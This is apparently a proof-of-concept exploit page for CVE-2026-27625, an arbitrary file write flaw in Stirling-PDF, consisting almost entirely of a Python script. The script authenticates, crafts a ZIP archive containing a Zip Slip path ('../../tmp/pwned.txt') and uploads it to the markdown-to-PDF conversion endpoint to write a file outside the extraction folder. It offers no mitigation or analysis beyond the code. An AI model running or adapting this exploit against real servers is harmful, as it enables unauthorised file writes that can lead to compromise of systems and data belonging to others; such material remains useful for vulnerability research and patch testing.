CVE-2026-27625 Stirling-PDF 任意文件写入漏洞

import requests import zipfile import io # Target configuration target_url = "http://localhost:8080/api/v1/convert/markdown/pdf" login_url = "http://localhost:8080/api/v1/auth/login" username = "attacker" password = "password" # Create a requests session session = requests.Session() # Step 1: Authenticate to get a valid session login_payload = { "username": username, "password": password } login_response = session.post(login_url, json=login_payload) if login_response.status_code != 200: print("Login failed") exit() # Step 2: Create a malicious ZIP file using Zip Slip technique # This attempts to write a file outside the extraction directory zip_buffer = io.BytesIO() with zipfile.ZipFile(zip_buffer, 'w', zipfile.ZIP_DEFLATED) as zf: # The path "../../tmp/pwned.txt" tries to escape the temp folder zf.writestr("../../tmp/pwned.txt", "This is an arbitrary file write via CVE-2026-27625") zip_buffer.seek(0) # Step 3: Send the exploit payload files = { 'file': ('exploit.zip', zip_buffer, 'application/zip') } response = session.post(target_url, files=files) print(f"Exploit sent. Status Code: {response.status_code}") print(f"Response: {response.text}")